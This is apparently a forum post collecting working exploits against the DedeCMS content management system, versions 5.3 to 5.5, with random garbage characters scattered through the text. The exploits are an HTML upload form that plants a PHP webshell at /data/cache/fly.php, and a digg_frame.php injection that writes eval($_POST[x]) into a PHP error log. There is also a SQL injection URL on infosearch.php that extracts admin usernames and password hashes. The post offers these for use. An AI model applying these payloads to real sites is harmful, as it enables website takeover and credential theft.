, @6 a8 e N9 [" {8 m<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>6 S$ n/ \+ o: m+ x! |4 S/ i/ b6 _
</head>/ K1 E3 J3 h" E% H
<body style="FONT-SIZE: 9pt">
5 o+ r* O, Z/ q+ ~5 A7 t---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />+ C' z) z4 U: s. x$ |
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
! w/ [: ?/ ?3 [6 n: T, d) H3 [0 E<input type='hidden' name='activepath' value='/data/cache/' />$ k0 r" @7 O/ l- X& j+ S' `
<input type='hidden' name='cfg_basedir' value='../../' />
& ?$ s% b) e/ r' E6 ]<input type='hidden' name='cfg_imgtype' value='php' />
4 `" g6 _8 L% d' t# \<input type='hidden' name='cfg_not_allowall' value='txt' />
/ v- B( r% h+ Z' j; s9 } r& }4 @<input type='hidden' name='cfg_softtype' value='php' />4 e5 [9 a K2 v- y* N9 m! h ^4 I
<input type='hidden' name='cfg_mediatype' value='php' />0 c& ?2 y1 J7 q5 m- D
<input type='hidden' name='f' value='form1.enclosure' />
. o7 {; z$ M4 l* D( x3 s' B* y: D% q<input type='hidden' name='job' value='upload' />
! A' c9 x+ R/ g1 Q; O/ A) X& f<input type='hidden' name='newname' value='fly.php' />
+ f' B% E, ^% a* y' G& A0 |& GSelect U Shell <input type='file' name='uploadfile' size='25' /> n8 t2 e0 h6 Q; Y# h6 [( A# [
<input type='submit' name='sb1' value='确定' />7 ^, C* S' [& Z, L4 z5 z, u
</form>5 l8 n' L! g+ u. E% B
<br />It's just a exp for the bug of Dedecms V55...<br />
]6 S% w- I# @Need register_globals = on...<br />+ W5 K: U8 l5 `$ j% T4 L
Fun the game,get a webshell at /data/cache/fly.php...<br />
7 O& B3 c, t4 ]# D9 O4 m3 C- n6 U" e</body>8 ^' I* k. V8 ~ _2 Y
</html>
' D- A6 }) y$ Q; L3 c% d6 \. a
1 p! G/ n$ x2 A6 X% j
5 W3 ]0 q. [7 _9 ^
; C' V3 i. m) S' I" a4 T. e4 M& E& p0 K8 O
5 E+ d) n6 z- U3 c! P- x
: D: f' i- g6 ^- J+ r
$ c+ z$ o, R' ?; Y; H
) Y& p* O3 i8 Q& x' I2 D" w0 s f. R: v/ x+ d" q" Q, Q0 Z6 t
5 A) E" A3 U) d& s8 A3 z! d; b7 w1 K织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞+ V, r7 f; U5 a
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。6 s1 ~: ~/ I8 ? F1 d" ?+ J
1. 访问网址:
4 B- p% l$ ^" ~6 |+ E) \5 m/ Khttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
5 a. ?7 H- F! J: q: x3 |0 I: s% S) @; ^: x6 I可看见错误信息
' l# ? w2 ]' i l" l7 ]2 \% Y( C" Q2 e* d# U" u
7 y: @, V7 {4 O. _* r% D$ V5 r
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。8 V* H0 Y i1 W# J! R0 B# Q
int(3) Error: Illegal double '1024e1024' value found during parsing
5 a! V% w5 u W* ?Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
. H/ D' |, T2 D0 ~5 n( I
+ x- g! m2 p( Z8 T* h( n; ~& V0 d9 o: s
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
0 l( Y! q. }% D4 H$ B2 g6 d* B$ S, w" ^1 B2 q0 ^. o
9 w$ d( P" i) ]/ Z<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
1 Q: y+ ]' v! {5 _3 O, A% W4 a2 j& d4 z, u
* B$ V3 N+ q) W; U0 o按确定后的看到第2步骤的信息表示文件木马上传成功.' u8 P* t' x5 g4 ~* A& d' W
- x( W R! Z8 X- |2 m$ n
+ ]- I& z7 c* F- f( z3 H T: z
- D; R& Q+ Z6 }: O1 Z+ p
' ^4 v7 I0 Y. Q# z2 B* V# Y5 }5 s8 S/ e
2 ^ v, B% m) S% k- V: d# H" l2 E
, L$ R9 ?( ~' u$ C' p( x/ B5 ]+ |
; w5 B$ O+ T. @
4 y5 R2 _9 m2 ?2 n. @
0 l9 _ \" ?: A/ n( ^0 `
% ^( \2 K- b. i3 I. h& f* Q4 l
; d: j) g8 Z9 h, i3 J. r0 i `
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
: B, l m& J3 c5 t$ `http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对